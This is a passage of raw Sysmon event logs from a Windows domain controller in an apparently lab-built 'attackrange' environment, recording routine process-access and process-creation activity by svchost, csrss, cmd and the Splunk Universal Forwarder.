08:41:25.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001873Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001872Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001871Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001870Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.168{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001869Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.168{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B5-5F84-5100-000000007F01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001868Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.168{5D479F2C-16B3-5F84-4800-000000007F01}32842912C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B5-5F84-5100-000000007F01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001867Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.182{5D479F2C-16B5-5F84-5100-000000007F01}3720C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001866Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.136{5D479F2C-16B4-5F84-5000-000000007F01}36723676C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002187Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B6-5F84-6100-000000007F01}4064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002186Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002185Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002184Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002183Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002182Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002181Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002180Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002179Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002178Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-6100-000000007F01}4064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002176Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.902{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B6-5F84-6100-000000007F01}4064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002175Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.904{5D479F2C-16B6-5F84-6100-000000007F01}4064C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002174Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B6-5F84-6000-000000007F01}4044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002173Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002172Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002171Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002170Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\